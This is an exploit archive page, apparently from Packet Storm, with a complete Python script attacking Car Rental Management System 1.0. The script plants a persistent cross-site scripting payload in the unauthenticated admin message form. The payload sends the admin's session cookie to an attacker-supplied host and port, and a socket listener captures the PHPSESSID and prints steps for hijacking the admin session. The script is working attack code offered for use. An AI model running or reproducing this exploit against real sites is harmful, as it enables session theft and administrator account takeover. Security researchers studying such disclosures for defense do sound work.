exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Car Rental Management System 1.0 Cross Site Scripting

Car Rental Management System 1.0 Cross Site Scripting
Posted Aug 7, 2020
Authored by Bobby Cooke

Car Rental Management System version 1.0 unauthenticated persistent cross site scripting session harvester exploit.

tags | exploit, xss
SHA-256 | b40d22bc3d4f56d3e0cef9a50ef2bae88ee704433658470af06ab12026f23b0a

Car Rental Management System 1.0 Cross Site Scripting

Change Mirror Download
# Exploit Title:   Car Rental Management System v1.0 - Unauthenticated Persistent XSS Session Harvester
# Exploit Author: Bobby Cooke
# Date: August 6, 2020
# Vendor Homepage: https://projectworlds.in
# Software Link: https://github.com/projectworlds32/Car-Rental-Syatem-PHP-MYSQL/archive/master.zip
# Version: 1.0
# CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
# CWE-284: Improper Access Control
# OWASP Top Ten: A5:2017-Broken Access Control & A7:2017-Cross-Site Scripting (XSS)
# CVSS Base Score: 8.1 | Impact Subscore: 5.2 | Exploitability Subscore: 2.8
# CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
# Vulnerability Description:
# Persistent Cross-Site Scripting (XSS) vulnerability in 'message_admin.php' webpage of
# ProjectWorlds Car Rental Management System v1.0 allows unauthenticated remote attackers to
# harvest admin login session cookie & steal admin session via admin logging in.

import socket,sys,re,requests
import json
from thread import *
from colorama import Fore, Back, Style

F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]

def genXssPayload(LHOST,LPORT):
XSS_PAYLOAD = '<script>'
XSS_PAYLOAD += 'function cookieMonster() {'
XSS_PAYLOAD += 'new Image().src = "http://'+LHOST+':'+LPORT+'/?sessionID="+document.cookie;'
XSS_PAYLOAD += '}'
XSS_PAYLOAD += 'window.addEventListener("load", cookieMonster());'
XSS_PAYLOAD += '</script>'
return XSS_PAYLOAD

def clientthread(conn):
try:
while True:
data = conn.recv(1024)
sess = re.findall(r'PHPSESSID=\w*',data)
print(S[3]+F[6]+'javascript'+F[0]+':'+F[2]+'void'+F[0]+'('+F[6]+'document'+F[0]+'.'+F[3]+'cookie'+F[0]+'="'+F[5]+sess[0]+F[0]+'");'+F[0]+S[0])
print(ok+"Go to the admin page again to become "+F[2]+"ADMIN"+F[0])
if not data:
break
except:
conn.close()

def formatHelp(STRING):
return S[3]+F[2]+STRING+S[0]

def sig():
SIG = S[3]+F[4]+" .-----.._ ,--.\n"
SIG += F[4]+" | .. > ___ | | .--.\n"
SIG += F[4]+" | |.' ,'-'"+F[2]+"* *"+F[4]+"'-. |/ /__ __\n"
SIG += F[4]+" | </ "+F[2]+"* * *"+F[4]+" \ / \\/ \\\n"
SIG += F[4]+" | |> ) "+F[2]+" * *"+F[4]+" / \\ \\\n"
SIG += F[4]+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]
return SIG

def header():
head = S[3]+F[2]+' --- Car Rental MS v1.0 | Persistent XSS Credential Harvester ---\n'+S[0]
return head

if __name__ == "__main__":
print(header())
print(sig())
if len(sys.argv) != 4:
print(err+formatHelp("(+) Usage: python %s <WEBAPP_URL> <LHOST> <LPORT>" % sys.argv[0]))
print(err+formatHelp("(+) Example: python %s 'http://172.16.65.130/carrental/' '172.16.65.1' 80" % sys.argv[0]))
sys.exit(-1)
WEBAPP_URL = sys.argv[1]
LHOST = sys.argv[2]
LPORT = sys.argv[3]
if not re.match(r".*/$", WEBAPP_URL):
WEBAPP_URL = WEBAPP_URL+'/'
MSG_ADMIN = WEBAPP_URL+'message_admin.php'
s = requests.Session()
PAYLOAD = genXssPayload(LHOST,LPORT)
fdata = {'message' : PAYLOAD, 'send' : '1337Hax0rz'}
sendPayload = s.post(url=MSG_ADMIN, data=fdata, verify=False)
if sendPayload.status_code == 200:
print(ok+"Sent POST Request to "+F[5]+S[3]+MSG_ADMIN+F[0]+S[0]+" with "+F[7]+S[3]+"Payload"+F[0]+S[0]+":")
print(S[3]+F[7]+json.dumps(fdata, sort_keys=True, indent=4)+F[0]+S[0])
else:
print(err+'Cannot send payload to webserver.')
sys.exit(-1)
print(ok+S[3]+F[2]+'Starting Session ID Harvester'+F[0])
LPORT = int(LPORT)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((LHOST,LPORT))
print(ok+"Bound to Socket.")
sock.listen(10)
print(ok+"Listening on Socket for incoming connections.")
except:
print(err+"Failed to bind to Socket.")
try:
while 1:
conn, addr = sock.accept()
print(ok+"Victim connected from "+addr[0]+":"+str(addr[1]))
print(ok+"In FireFox go to: "+F[3]+WEBAPP_URL+"/admin/index.php"+F[0])
print(ok+"Open the Web Console and enter: "+F[0])
start_new_thread(clientthread ,(conn,))
except:
sock.close()
print(err+"Exiting Credential Harvester..")
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close